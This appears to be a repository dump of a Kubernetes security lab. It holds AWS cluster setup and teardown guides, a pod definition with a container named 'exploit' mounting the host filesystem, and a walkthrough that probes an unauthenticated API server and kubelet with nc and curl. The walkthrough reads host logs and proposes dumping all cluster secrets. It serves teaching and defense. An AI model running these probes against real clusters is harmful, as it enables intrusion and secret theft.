false 77 | } 78 | }, 79 | { 80 | "name": "exploit", 81 | "image": "nginx:latest", 82 | "command": [ 83 | "/bin/bash" 84 | ], 85 | "args": [ 86 | "-c", 87 | "if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi" 88 | ], 89 | "resources": {}, 90 | "volumeMounts": [ 91 | { 92 | "name": "escape-volume", 93 | "mountPath": "/rootfs", 94 | "subPath": "host" 95 | }, 96 | { 97 | "name": "status-volume", 98 | "mountPath": "/status" 99 | } 100 | ], 101 | "terminationMessagePath": "/dev/termination-log", 102 | "terminationMessagePolicy": "File", 103 | "imagePullPolicy": "Always", 104 | "securityContext": { 105 | "capabilities": { 106 | "drop": [ 107 | "CHOWN", 108 | "DAC_OVERRIDE", 109 | "FOWNER", 110 | "FSETID", 111 | "KILL", 112 | "SETGID", 113 | "SETUID", 114 | "SETPCAP", 115 | "NET_BIND_SERVICE", 116 | "NET_ADMIN", 117 | "NET_RAW", 118 | "MKNOD", 119 | "AUDIT_WRITE" 120 | ] 121 | }, 122 | "allowPrivilegeEscalation": false 123 | } 124 | } 125 | ], 126 | "restartPolicy": "Always", 127 | "terminationGracePeriodSeconds": 30, 128 | "dnsPolicy": "ClusterFirst", 129 | "nodeName": "ip-10-1-0-10", 130 | "securityContext": {}, 131 | "schedulerName": "default-scheduler" 132 | }, 133 | "status": { 134 | "phase": "Running", 135 | "conditions": [ 136 | { 137 | "type": "Initialized", 138 | "status": "True", 139 | 
"lastProbeTime": null, 140 | "lastTransitionTime": "2018-03-23T13:29:44Z" 141 | }, 142 | { 143 | "type": "Ready", 144 | "status": "True", 145 | "lastProbeTime": null, 146 | "lastTransitionTime": "2018-03-23T13:29:46Z" 147 | }, 148 | { 149 | "type": "PodScheduled", 150 | "status": "True", 151 | "lastProbeTime": null, 152 | "lastTransitionTime": "2018-03-23T13:29:44Z" 153 | } 154 | ], 155 | "hostIP": "10.1.0.10", 156 | "podIP": "10.2.0.39", 157 | "startTime": "2018-03-23T13:29:44Z", 158 | "containerStatuses": [ 159 | { 160 | "name": "exploit", 161 | "state": { 162 | "running": { 163 | "startedAt": "2018-03-23T13:29:45Z" 164 | } 165 | }, 166 | "lastState": {}, 167 | "ready": true, 168 | "restartCount": 0, 169 | "image": "nginx:latest", 170 | "imageID": "docker-pullable://nginx@sha256:c4ee0ecb376636258447e1d8effb56c09c75fe7acf756bf7c13efadf38aa0aca", 171 | "containerID": "docker://3f055bd81ff8d971d8392704efc3d8194895373bca1378194acc57e371626e72" 172 | }, 173 | { 174 | "name": "setup", 175 | "state": { 176 | "running": { 177 | "startedAt": "2018-03-23T13:29:45Z" 178 | } 179 | }, 180 | "lastState": {}, 181 | "ready": true, 182 | "restartCount": 0, 183 | "image": "nginx:latest", 184 | "imageID": "docker-pullable://nginx@sha256:c4ee0ecb376636258447e1d8effb56c09c75fe7acf756bf7c13efadf38aa0aca", 185 | "containerID": "docker://294d653161ac9e387b173c2cead5033c1e51800e6cea28116979e3442944783f" 186 | } 187 | ], 188 | "qosClass": "BestEffort" 189 | } 190 | }, 191 | { 192 | "metadata": { 193 | "name": "kubernetes-dashboard-5b575fd4c-77fqr", 194 | "generateName": "kubernetes-dashboard-5b575fd4c-", 195 | "namespace": "kube-system", 196 | "selfLink": "/api/v1/namespaces/kube-system/pods/kubernetes-dashboard-5b575fd4c-77fqr", 197 | "uid": "d60f089f-0a85-11e8-9462-06d7638bd978", 198 | "resourceVersion": "1813", 199 | "creationTimestamp": "2018-02-05T15:04:17Z", 200 | "labels": { 201 | "k8s-addon": "kubernetes-dashboard.addons.k8s.io", 202 | "k8s-app": "kubernetes-dashboard", 203 | "kubernetes.io/cluster-service": "true", 204 | "pod-template-hash": "161319807", 205 | "version": "v1.6.3" 206 | }, 207 | "annotations": { 208 | "kubernetes.io/config.seen": "2018-03-17T14:35:59.815512435Z", 209 | "kubernetes.io/config.source": "api", 210 | "scheduler.alpha.kubernetes.io/critical-pod": "", 211 | "scheduler.alpha.kubernetes.io/tolerations": "[{\"key\":\"CriticalAddonsOnly\", \"operator\":\"Exists\"}]" 212 | }, 213 | "ownerReferences": [ 214 | { 215 | "apiVersion": "extensions/v1beta1", 216 | "kind": "ReplicaSet", 217 | "name": "kubernetes-dashboard-5b575fd4c", 218 | "uid": "d60dcfa3-0a85-11e8-9462-06d7638bd978", 219 | "controller": true, 220 | "blockOwnerDeletion": true 221 | } 222 | ] 223 | }, 224 | "spec": { 225 | "containers": [ 226 | { 227 | "name": "kubernetes-dashboard", 228 | "image": "gcr.io/google_containers/kubernetes-dashboard-amd64:v1.6.3", 229 | "args": [ 230 | "--apiserver-host=http://10.1.0.10:8080" 231 | ], 232 | "ports": [ 233 | { 234 | "containerPort": 9090, 235 | "protocol": "TCP" 236 | } 237 | ], 238 | "resources": { 239 | "limits": { 240 | "cpu": "100m", 241 | "memory": "50Mi" 242 | }, 243 | "requests": { 244 | "cpu": "100m", 245 | "memory": "50Mi" 246 | } 247 | }, 248 | "livenessProbe": { 249 | "httpGet": { 250 | "path": "/", 251 | "port": 9090, 252 | "scheme": "HTTP" 253 | }, 254 | "initialDelaySeconds": 30, 255 | "timeoutSeconds": 30, 256 | "periodSeconds": 10, 257 | "successThreshold": 1, 258 | "failureThreshold": 3 259 | }, 260 | "terminationMessagePath": "/dev/termination-log", 261 | 
"terminationMessagePolicy": "File", 262 | "imagePullPolicy": "IfNotPresent" 263 | } 264 | ], 265 | "restartPolicy": "Always", 266 | "terminationGracePeriodSeconds": 30, 267 | "dnsPolicy": "ClusterFirst", 268 | "serviceAccountName": "kubernetes-dashboard", 269 | "serviceAccount": "kubernetes-dashboard", 270 | "nodeName": "ip-10-1-0-10", 271 | "securityContext": {}, 272 | "schedulerName": "default-scheduler", 273 | "tolerations": [ 274 | { 275 | "key": "node-role.kubernetes.io/master", 276 | "effect": "NoSchedule" 277 | } 278 | ] 279 | }, 280 | "status": { 281 | "phase": "Running", 282 | "conditions": [ 283 | { 284 | "type": "Initialized", 285 | "status": "True", 286 | "lastProbeTime": null, 287 | "lastTransitionTime": "2018-02-05T15:04:17Z" 288 | }, 289 | { 290 | "type": "Ready", 291 | "status": "True", 292 | "lastProbeTime": null, 293 | "lastTransitionTime": "2018-03-17T14:36:01Z" 294 | }, 295 | { 296 | "type": "PodScheduled", 297 | "status": "True", 298 | "lastProbeTime": null, 299 | "lastTransitionTime": "2018-02-05T15:04:17Z" 300 | } 301 | ], 302 | "hostIP": "10.1.0.10", 303 | "podIP": "10.2.0.4", 304 | "startTime": "2018-02-05T15:04:17Z", 305 | "containerStatuses": [ 306 | { 307 | "name": "kubernetes-dashboard", 308 | "state": { 309 | "running": { 310 | "startedAt": "2018-03-17T14:36:01Z" 311 | } 312 | }, 313 | "lastState": { 314 | "terminated": { 315 | "exitCode": 2, 316 | "reason": "Error", 317 | "startedAt": "2018-02-05T15:08:16Z", 318 | "finishedAt": "2018-02-05T15:32:50Z", 319 | "containerID": "docker://15d44b7d87a258a0d18c38ec64f4129169d5ae568d1b3384a22e09256d7a0483" 320 | } 321 | }, 322 | "ready": true, 323 | "restartCount": 3, 324 | "image": "gcr.io/google_containers/kubernetes-dashboard-amd64:v1.6.3", 325 | "imageID": "docker-pullable://gcr.io/google_containers/kubernetes-dashboard-amd64@sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe", 326 | "containerID": "docker://a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17" 327 | } 328 | ], 329 | "qosClass": "Guaranteed" 330 | } 331 | } 332 | ] 333 | } 334 | 335 | ``` 336 | 337 | -------------------------------------------------------------------------------- /docs/cmd/kubelet-spec.md: -------------------------------------------------------------------------------- 1 | [Back](/docs/direct-controller.md) 2 | 3 | ``` 4 | { 5 | "num_cores": 1, 6 | "cpu_frequency_khz": 2400088, 7 | "memory_capacity": 2095865856, 8 | "hugepages": [ 9 | { 10 | "page_size": 2048, 11 | "num_pages": 0 12 | } 13 | ], 14 | "machine_id": "9388fcdf27304278a02f83a9c2d5333d", 15 | "system_uuid": "EC2826BA-6C3E-72DF-F19A-D389212A0C7D", 16 | "boot_id": "57596319-1c3e-4bb9-9514-97e9a9ccede6", 17 | "filesystems": [ 18 | { 19 | "device": "/dev/xvda1", 20 | "capacity": 33240739840, 21 | "type": "vfs", 22 | "inodes": 4096000, 23 | "has_inodes": true 24 | }, 25 | { 26 | "device": "tmpfs", 27 | "capacity": 209588224, 28 | "type": "vfs", 29 | "inodes": 255843, 30 | "has_inodes": true 31 | } 32 | ], 33 | "disk_map": { 34 | "202:0": { 35 | "name": "xvda", 36 | "major": 202, 37 | "minor": 0, 38 | "size": 34359738368, 39 | "scheduler": "none" 40 | } 41 | }, 42 | "network_devices": [ 43 | { 44 | "name": "eth0", 45 | "mac_address": "06:d7:63:8b:d9:78", 46 | "speed": 0, 47 | "mtu": 9001 48 | } 49 | ], 50 | "topology": [ 51 | { 52 | "node_id": 0, 53 | "memory": 2095865856, 54 | "cores": [ 55 | { 56 | "core_id": 0, 57 | "thread_ids": [ 58 | 0 59 | ], 60 | "caches": [ 61 | { 62 | "size": 32768, 63 | "type": "Data", 64 | "level": 1 65 | }, 66 | { 
67 | "size": 32768, 68 | "type": "Instruction", 69 | "level": 1 70 | }, 71 | { 72 | "size": 262144, 73 | "type": "Unified", 74 | "level": 2 75 | } 76 | ] 77 | } 78 | ], 79 | "caches": [ 80 | { 81 | "size": 31457280, 82 | "type": "Unified", 83 | "level": 3 84 | } 85 | ] 86 | } 87 | ], 88 | "cloud_provider": "AWS", 89 | "instance_type": "t2.small", 90 | "instance_id": "i-05bb925bb00bf3bcc" 91 | } 92 | ``` 93 | 94 | -------------------------------------------------------------------------------- /docs/create-kubeconfig.md: -------------------------------------------------------------------------------- 1 | # Create the local ```kubeconfig``` file 2 | 3 | 4 | From the same installation system shell, obtain the controller system IP 5 | ``` 6 | $ CONTROLLER_IP=$(aws ec2 describe-instances \ 7 | --region ${AWS_DEFAULT_REGION} \ 8 | --filter 'Name=tag:Name,Values=controller' \ 9 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 10 | --output text) 11 | ``` 12 | 13 | Create the ```kubeconfig``` file locally 14 | ``` 15 | $ cat > kubeconfig < 9m v1.9.2 46 | ip-10-1-0-11 Ready 6m v1.9.2 47 | ip-10-1-0-12 Ready 1m v1.9.2 48 | ``` 49 | 50 | [Back](/README.md#build-the-cluster) | [Next](deploy-kube-dns.md) 51 | -------------------------------------------------------------------------------- /docs/create-vpc.md: -------------------------------------------------------------------------------- 1 | # Launch and Configure the VPC 2 | 3 | ## Cloudformation Template 4 | 5 | From inside the repo directory on your installation system, set a few environment variables. Note: You will need the AMI for your region to be correct. See: [Ubuntu 16.0.4 LTS](http://cloud-images.ubuntu.com/locator/ec2/) and search for '16.04 LTS hvm:ebs-ssd' 6 | ``` 7 | $ export STACK_NAME="hkfs" 8 | export AWS_DEFAULT_REGION="us-east-1" 9 | export KEY_NAME="hkfs" 10 | export IMAGE_ID="ami-66506c1c" 11 | ``` 12 | 13 | Deploy the Cloudformation template to create the VPC, subnet, route table, route table association, and internet gateway. 14 | ``` 15 | $ aws cloudformation create-stack --region ${AWS_DEFAULT_REGION} --stack-name ${STACK_NAME} \ 16 | --template-body file://templates/${STACK_NAME}.json --output text 17 | ``` 18 | 19 | Obtain the VPC Id 20 | ``` 21 | $ VPC_ID="$(aws cloudformation describe-stacks --region ${AWS_DEFAULT_REGION} \ 22 | --query 'Stacks[*].Outputs[?OutputKey==`VPCId`].OutputValue[]' \ 23 | --stack-name ${STACK_NAME} --output text)" 24 | $ echo "${VPC_ID}" 25 | ``` 26 | 27 | Obtain the Security Group Id 28 | ``` 29 | $ SG_ID="$(aws ec2 describe-security-groups --query 'SecurityGroups[*].GroupId' \ 30 | --region ${AWS_DEFAULT_REGION} --filter "Name=vpc-id,Values=${VPC_ID}" --output text)" 31 | $ echo "${SG_ID}" 32 | ``` 33 | 34 | Obtain the Subnet Id 35 | ``` 36 | $ SUBNET_ID="$(aws ec2 describe-subnets --region ${AWS_DEFAULT_REGION} \ 37 | --filter "Name=tag:Name,Values=${STACK_NAME}-subnet" --query 'Subnets[*].SubnetId' \ 38 | --output text)" 39 | $ echo "${SUBNET_ID}" 40 | ``` 41 | 42 | Allow just one IP to access the cluster instances. 
43 | ``` 44 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} --group-id ${SG_ID} \ 45 | --protocol all --port 0 --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 46 | ``` 47 | 48 | Create a new SSH keypair 49 | ``` 50 | $ aws ec2 create-key-pair --region ${AWS_DEFAULT_REGION} --key-name ${KEY_NAME} \ 51 | --query 'KeyMaterial' --output text > ${KEY_NAME}.pem 52 | $ chmod 600 ${KEY_NAME}.pem 53 | ``` 54 | 55 | [Back](/README.md#build-the-cluster) | [Next](launch-configure-etcd.md) 56 | -------------------------------------------------------------------------------- /docs/delete-instances.md: -------------------------------------------------------------------------------- 1 | # Delete Instances 2 | 3 | ## ```worker-1``` and ```worker-2``` Deletion 4 | 5 | Set some ENV variables 6 | ``` 7 | $ export AWS_DEFAULT_REGION="us-east-1" 8 | $ export KEY_NAME="hkfs" 9 | ``` 10 | 11 | Obtain the Worker Instance IDs 12 | ``` 13 | $ INSTANCE1_ID="$(aws ec2 describe-instances \ 14 | --region ${AWS_DEFAULT_REGION} \ 15 | --filter 'Name=tag:Name,Values=worker-1' \ 16 | --query 'Reservations[].Instances[].InstanceId' \ 17 | --output text)" 18 | $ INSTANCE2_ID="$(aws ec2 describe-instances \ 19 | --region ${AWS_DEFAULT_REGION} \ 20 | --filter 'Name=tag:Name,Values=worker-2' \ 21 | --query 'Reservations[].Instances[].InstanceId' \ 22 | --output text)" 23 | ``` 24 | 25 | Terminate ```worker-1``` and ```worker-2``` 26 | ``` 27 | $ aws ec2 terminate-instances \ 28 | --region ${AWS_DEFAULT_REGION} \ 29 | --instance-ids ${INSTANCE1_ID} 30 | $ aws ec2 terminate-instances \ 31 | --region ${AWS_DEFAULT_REGION} \ 32 | --instance-ids ${INSTANCE2_ID} 33 | ``` 34 | 35 | ## ```controller``` Deletion 36 | 37 | Obtain the ```controller``` Instance ID and Terminate 38 | ``` 39 | $ INSTANCEM_ID="$(aws ec2 describe-instances \ 40 | --region ${AWS_DEFAULT_REGION} \ 41 | --filter 'Name=tag:Name,Values=controller' \ 42 | --query 'Reservations[].Instances[].InstanceId' \ 43 | --output text)" 44 | $ aws ec2 terminate-instances \ 45 | --region ${AWS_DEFAULT_REGION} \ 46 | --instance-ids ${INSTANCEM_ID} 47 | ``` 48 | 49 | ## ```etcd``` Deletion 50 | 51 | Obtain the ```etcd``` Instance ID and Terminate 52 | 53 | ``` 54 | $ INSTANCEE_ID="$(aws ec2 describe-instances \ 55 | --region ${AWS_DEFAULT_REGION} \ 56 | --filter 'Name=tag:Name,Values=etcd' \ 57 | --query 'Reservations[].Instances[].InstanceId' \ 58 | --output text)" 59 | $ aws ec2 terminate-instances \ 60 | --region ${AWS_DEFAULT_REGION} \ 61 | --instance-ids ${INSTANCEE_ID} 62 | ``` 63 | 64 | SSH Keypair Deletion 65 | ``` 66 | $ aws ec2 delete-key-pair --region ${AWS_DEFAULT_REGION} --key-name "${KEY_NAME}" 67 | ``` 68 | 69 | [Back](/README.md) | [Next](delete-vpc.md) 70 | -------------------------------------------------------------------------------- /docs/delete-vpc.md: -------------------------------------------------------------------------------- 1 | # Delete VPC 2 | 3 | Set some ENV variables 4 | ``` 5 | $ export AWS_DEFAULT_REGION="us-east-1" 6 | $ export STACK_NAME="hkfs" 7 | ``` 8 | 9 | Destroy the VPC via Cloudformation stack deletion 10 | ``` 11 | $ aws cloudformation delete-stack --region ${AWS_DEFAULT_REGION} --stack-name ${STACK_NAME} 12 | ``` 13 | 14 | [Back](/README.md) 15 | -------------------------------------------------------------------------------- /docs/deploy-basic-dashboard.md: -------------------------------------------------------------------------------- 1 | # Deploy the Kubernetes Dashboard 2 | 3 | From the same installation 
system shell, create the ```basic-dashboard.yml``` Definition 4 | 5 | ``` 6 | $ cat > basic-dashboard.yml < 9090 102 | ``` 103 | 104 | In a browser, visit: 105 | ``` 106 | http://localhost:8000 107 | ``` 108 | 109 | [Back](/README.md#level-0-security) | [Next](enumerate-ports.md) 110 | -------------------------------------------------------------------------------- /docs/deploy-heapster.md: -------------------------------------------------------------------------------- 1 | # Deploy Heapster 2 | 3 | From the same installation system shell, create the ```kube-dns.yml``` Definition 4 | 5 | ``` 6 | $ cat > heapster.yml < kube-dns.yml < azure-vote.yml <Temporary Redirect. 49 | ``` 50 | Navigate to it using a browser: 51 | ``` 52 | $ open http://$CONTROLLERIP:4194/containers/ 53 | ``` 54 | Hit `tcp/4194` on the Prometheus formatted `/metrics` endpoint: 55 | 56 | [```$ curl $CONTROLLERIP:4194/metrics```](cmd/cadvisor-metrics.md) 57 | 58 | As you can see, there are many pieces of information that describe the infrastructure that should not be exposed to an attacker. 59 | 60 | From the `/containers/` endpoint: 61 | 62 | - How many CPU shares and how much RAM is available on this node. 63 | - How much CPU/RAM/Disk/FS is in use, and that usage over time. 64 | - A full process listing complete with base process name, PID, UID, GID, CPU usage, Memory usage, and time running. 65 | 66 | From the `/metrics` endpoint: 67 | 68 | - Useful information about the Host OS and container runtime: 69 | 70 | ``` 71 | cadvisor_version_info{cadvisorRevision="",cadvisorVersion="",dockerVersion="1.13.1",kernelVersion="4.4.0-1049-aws",osVersion="Ubuntu 16.04.3 LTS"} 1 72 | ``` 73 | 74 | - When a container was created/started. In this case: `Saturday, March 17, 2018 2:36:01 PM` 75 | 76 | ``` 77 | container_start_time_seconds{container_name="kubernetes-dashboard",id="/kubepods/podd60f089f-0a85-11e8-9462-06d7638bd978/a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17",image="gcr.io/google_containers/kubernetes-dashboard-amd64@sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe",name="k8s_kubernetes-dashboard_kubernetes-dashboard-5b575fd4c-77fqr_kube-system_d60f089f-0a85-11e8-9462-06d7638bd978_3",namespace="kube-system",pod_name="kubernetes-dashboard-5b575fd4c-77fqr"} 1.521297361e+09 78 | ``` 79 | 80 | 81 | - A full listing of the containers running on this host plus a lot of metadata about each one. For example, this single metric from one pod offers: 82 | 83 | ``` 84 | ...snip... 85 | container_cpu_load_average_10s{container_name="kubernetes-dashboard",id="/kubepods/podd60f089f-0a85-11e8-9462-06d7638bd978/a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17",image="gcr.io/google_containers/kubernetes-dashboard-amd64@sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe",name="k8s_kubernetes-dashboard_kubernetes-dashboard-5b575fd4c-77fqr_kube-system_d60f089f-0a85-11e8-9462-06d7638bd978_3",namespace="kube-system",pod_name="kubernetes-dashboard-5b575fd4c-77fqr"} 0 86 | ...snip... 
87 | ``` 88 | 89 | - Container name: `kubernetes-dashboard` 90 | - Namespace: `kube-system` 91 | - Image: `gcr.io/google_containers/kubernetes-dashboard-amd64` 92 | - Image Version/Hash: `sha256:2c4421ed80358a0ee97b44357b6cd6dc09be6ccc27dfe9d50c9bfc39a760e5fe` 93 | - Pod name: `kubernetes-dashboard-5b575fd4c-77fqr` 94 | - Kubernetes Deployment UID: `d60f089f-0a85-11e8-9462-06d7638bd978` 95 | - Runtime (Docker) Container ID: `a3c7cd6d8e0ebf603b431604ab7a1844f8ed0b651b231b10849010fd7cf37b17` 96 | 97 | Using just this information from cAdvisor, it's possible to gather a tremendous amount of information about the node's Host OS, the Network interface names, the CPU/RAM/Net/Disk utilization (over time), the processes running, and how long they've been running. What a helpful service! 98 | 99 | ### Probe the "Insecure" `Kubernetes API` service: 100 | 101 | Verify the port is responding: 102 | ``` 103 | $ nc -vz $CONTROLLERIP 8080 104 | Connection to 54.89.108.72 port 8080 [tcp/http-alt] succeeded! 105 | ``` 106 | 107 | Curl the API Server directly: 108 | ``` 109 | $ $ curl $CONTROLLERIP:8080 110 | { 111 | "paths": [ 112 | "/api", 113 | "/api/v1", 114 | "/apis", 115 | "/apis/", 116 | "/apis/admissionregistration.k8s.io", 117 | "/apis/admissionregistration.k8s.io/v1beta1", 118 | "/apis/apiextensions.k8s.io", 119 | "/apis/apiextensions.k8s.io/v1beta1", 120 | "/apis/apiregistration.k8s.io", 121 | "/apis/apiregistration.k8s.io/v1beta1", 122 | "/apis/apps", 123 | "/apis/apps/v1", 124 | "/apis/apps/v1beta1", 125 | "/apis/apps/v1beta2", 126 | "/apis/authentication.k8s.io", 127 | "/apis/authentication.k8s.io/v1", 128 | "/apis/authentication.k8s.io/v1beta1", 129 | "/apis/authorization.k8s.io", 130 | "/apis/authorization.k8s.io/v1", 131 | "/apis/authorization.k8s.io/v1beta1", 132 | "/apis/autoscaling", 133 | "/apis/autoscaling/v1", 134 | "/apis/autoscaling/v2beta1", 135 | "/apis/batch", 136 | "/apis/batch/v1", 137 | "/apis/batch/v1beta1", 138 | "/apis/certificates.k8s.io", 139 | "/apis/certificates.k8s.io/v1beta1", 140 | "/apis/events.k8s.io", 141 | "/apis/events.k8s.io/v1beta1", 142 | "/apis/extensions", 143 | "/apis/extensions/v1beta1", 144 | "/apis/networking.k8s.io", 145 | "/apis/networking.k8s.io/v1", 146 | "/apis/policy", 147 | "/apis/policy/v1beta1", 148 | "/apis/rbac.authorization.k8s.io", 149 | "/apis/rbac.authorization.k8s.io/v1", 150 | "/apis/rbac.authorization.k8s.io/v1beta1", 151 | "/apis/storage.k8s.io", 152 | "/apis/storage.k8s.io/v1", 153 | "/apis/storage.k8s.io/v1beta1", 154 | "/healthz", 155 | "/healthz/autoregister-completion", 156 | "/healthz/etcd", 157 | "/healthz/ping", 158 | "/healthz/poststarthook/apiservice-openapi-controller", 159 | "/healthz/poststarthook/apiservice-registration-controller", 160 | "/healthz/poststarthook/apiservice-status-available-controller", 161 | "/healthz/poststarthook/bootstrap-controller", 162 | "/healthz/poststarthook/ca-registration", 163 | "/healthz/poststarthook/generic-apiserver-start-informers", 164 | "/healthz/poststarthook/kube-apiserver-autoregistration", 165 | "/healthz/poststarthook/start-apiextensions-controllers", 166 | "/healthz/poststarthook/start-apiextensions-informers", 167 | "/healthz/poststarthook/start-kube-aggregator-informers", 168 | "/healthz/poststarthook/start-kube-apiserver-informers", 169 | "/logs", 170 | "/metrics", 171 | "/swagger-2.0.0.json", 172 | "/swagger-2.0.0.pb-v1", 173 | "/swagger-2.0.0.pb-v1.gz", 174 | "/swagger.json", 175 | "/swaggerapi", 176 | "/ui", 177 | "/ui/", 178 | "/version" 179 | ] 180 | } 181 | ``` 182 | 
Because the unencrypted request was successful and the list of available endpoints came back, it means we have full access to the API server and can get/update/delete any information stored inside the cluster. 183 | 184 | Obtain the version of the Kubernetes API Server: 185 | ``` 186 | $ curl $CONTROLLERIP:8080/version 187 | { 188 | "major": "1", 189 | "minor": "9", 190 | "gitVersion": "v1.9.2", 191 | "gitCommit": "5fa2db2bd46ac79e5e00a4e6ed24191080aa463b", 192 | "gitTreeState": "clean", 193 | "buildDate": "2018-01-18T09:42:01Z", 194 | "goVersion": "go1.9.2", 195 | "compiler": "gc", 196 | "platform": "linux/amd64" 197 | } 198 | ``` 199 | 200 | List the services available via the API's built-in `/ui` proxy: 201 | ``` 202 | $ curl $CONTROLLERIP:8080/ui/ 203 | Temporary Redirect. 204 | ``` 205 | Because we have sufficient access to the cluster API, visiting this URL will likely result in the ability to access the Kubernetes dashboard in this cluster. 206 | 207 | Obtain logs from containers, pods, and system logging endpoints on the underlying host: 208 | ``` 209 | $ curl $CONTROLLERIP:8080/logs/ 210 |
211 | apt/
212 | auth.log
213 | auth.log.1
214 | auth.log.2.gz
215 | auth.log.3.gz
216 | btmp
217 | btmp.1
218 | cloud-init-output.log
219 | cloud-init.log
220 | containers/
221 | dist-upgrade/
222 | dpkg.log
223 | dpkg.log.1
224 | fsck/
225 | kern.log
226 | kern.log.1
227 | lastlog
228 | lxd/
229 | pods/
230 | syslog
231 | syslog.1
232 | syslog.2.gz
233 | syslog.3.gz
234 | syslog.4.gz
235 | syslog.5.gz
236 | syslog.6.gz
237 | syslog.7.gz
238 | unattended-upgrades/
239 | wtmp
240 | wtmp.1
241 | 
242 | ``` 243 | 244 | View, for example, the host `auth.log`: 245 | ``` 246 | $ curl $CONTROLLERIP:8080/logs/auth.log 247 | ...snip... 248 | Apr 10 02:17:01 ip-10-1-0-10 CRON[1571]: pam_unix(cron:session): session opened for user root by (uid=0) 249 | Apr 10 02:17:01 ip-10-1-0-10 CRON[1571]: pam_unix(cron:session): session closed for user root 250 | Apr 10 02:20:53 ip-10-1-0-10 sudo: pam_unix(sudo:session): session closed for user root 251 | Apr 10 02:20:54 ip-10-1-0-10 sshd[32757]: Received disconnect from x.x.x.x port 55139:11: disconnected by user 252 | Apr 10 02:20:54 ip-10-1-0-10 sshd[32757]: Disconnected from x.x.x.x port 55139 253 | Apr 10 02:20:54 ip-10-1-0-10 sshd[32718]: pam_unix(sshd:session): session closed for user ubuntu 254 | Apr 10 02:20:54 ip-10-1-0-10 systemd-logind[1231]: Removed session 630. 255 | Apr 10 02:20:54 ip-10-1-0-10 systemd: pam_unix(systemd-user:session): session closed for user ubuntu 256 | ``` 257 | 258 | View the `kubernetes-dashboard` pod logs: 259 | ``` 260 | $ curl $CONTROLLERIP:8080/logs/pods/d60f089f-0a85-11e8-9462-06d7638bd978/kubernetes-dashboard_2.log 261 | ...snip... 262 | {"log":"Using apiserver-host location: http://10.1.0.10:8080\n","stream":"stdout","time":"2018-02-05T15:08:17.444915083Z"} 263 | {"log":"Skipping in-cluster config\n","stream":"stdout","time":"2018-02-05T15:08:17.444920926Z"} 264 | {"log":"Using random key for csrf signing\n","stream":"stdout","time":"2018-02-05T15:08:17.444923968Z"} 265 | {"log":"No request provided. Skipping authorization header\n","stream":"stdout","time":"2018-02-05T15:08:17.44492672Z"} 266 | {"log":"Successful initial request to the apiserver, version: v1.9.2\n","stream":"stdout","time":"2018-02-05T15:08:17.44887775Z"} 267 | ``` 268 | 269 | Mimic the `kubectl get pods` command: 270 | ``` 271 | $ curl $CONTROLLERIP:8080/api/v1/namespaces/default/pods?limit=500 272 | { 273 | "kind": "PodList", 274 | "apiVersion": "v1", 275 | "metadata": { 276 | "selfLink": "/api/v1/namespaces/default/pods", 277 | "resourceVersion": "1633976" 278 | }, 279 | "items": [ 280 | { 281 | "metadata": { 282 | "name": "subpath", 283 | "namespace": "default", 284 | "selfLink": "/api/v1/namespaces/default/pods/subpath", 285 | "uid": "3fb02fa6-2e9e-11e8-9d04-06d7638bd978", 286 | "resourceVersion": "418041", 287 | "creationTimestamp": "2018-03-23T13:29:44Z" 288 | }, 289 | "spec": { 290 | "volumes": [ 291 | ...snip... 292 | ``` 293 | 294 | While not terribly practical, it is possible to interact with the API using `curl` as shown above. However, having the `kubectl` binary makes things much more user-friendly. 
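In practice, `kubectl` can simply be pointed at the open, unauthenticated endpoint. A minimal sketch (assuming the `kubectl` v1.9.2 binary from the prerequisites is on the local path):

```
# No kubeconfig, token, or certificate is needed--just the server address
$ kubectl --server=http://$CONTROLLERIP:8080 get nodes
$ kubectl --server=http://$CONTROLLERIP:8080 get pods --all-namespaces
# The same unauthenticated access extends to sensitive objects, e.g. every secret in the cluster
$ kubectl --server=http://$CONTROLLERIP:8080 get secrets --all-namespaces -o yaml
```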
295 | 296 | ### Probe the `Kubelet Healthz` service: 297 | 298 | Verify the port is responding: 299 | ``` 300 | $ nc -vz $CONTROLLERIP 10248 301 | nc: connectx to 54.89.108.72 port 10248 (tcp) failed: Connection refused 302 | ``` 303 | 304 | It's only running on the `localhost` address: 305 | ``` 306 | $ ssh -i ${KEY_NAME}.pem ubuntu@$CONTROLLERIP 307 | ubuntu@ip-10-1-0-10:~$ curl localhost:10248/ 308 | 404 page not found 309 | ubuntu@ip-10-1-0-10:~$ curl localhost:10248/healthz 310 | ok 311 | ``` 312 | 313 | ### Probe the `Kube-Proxy Metrics` service: 314 | 315 | Verify the port is responding: 316 | ``` 317 | $ nc -vz $CONTROLLERIP 10249 318 | nc: connectx to 54.89.108.72 port 10249 (tcp) failed: Connection refused 319 | ``` 320 | 321 | It's only running on the `localhost` address: 322 | ``` 323 | $ ssh -i ${KEY_NAME}.pem ubuntu@$CONTROLLERIP 324 | ubuntu@ip-10-1-0-10:~$ curl localhost:10249/healthz 325 | ok 326 | ubuntu@ip-10-1-0-10:~$ curl localhost:10249/metrics 327 | ``` 328 | 329 | ```ubuntu@ip-10-1-0-10:~$``` [```curl localhost:10249/metrics ```](cmd/kube-proxy-metrics.md) 330 | 331 | It can tell us how `kube-proxy` reaches the API server on `10.1.0.10:8080` without encryption necessary. 332 | 333 | ### Probe the `Kubelet Read/Write` service: 334 | 335 | Verify the port is responding: 336 | ``` 337 | $ nc -vz $CONTROLLERIP 10250 338 | Connection to 54.89.108.72 port 10250 [tcp/*] succeeded! 339 | ``` 340 | 341 | Hit `tcp/10250` via curl: 342 | 343 | ``` 344 | $ curl $CONTROLLERIP:10250 345 | 346 | $ curl -sk https://$CONTROLLERIP:10250 347 | 404 page not found 348 | ``` 349 | 350 | The lack of an authn/authz error means this port is unprotected, and it provides an extremely useful attack path to leverage the `kubelet` to have remote command execution inside nearly any pod/container, access to any pod log on that system, and access to any secret available to that node at a minimum. 351 | 352 | So, the Kubelet is always listening on a TLS port, but by default, it's not authenticating or authorizing access to it. The `-s` is to be 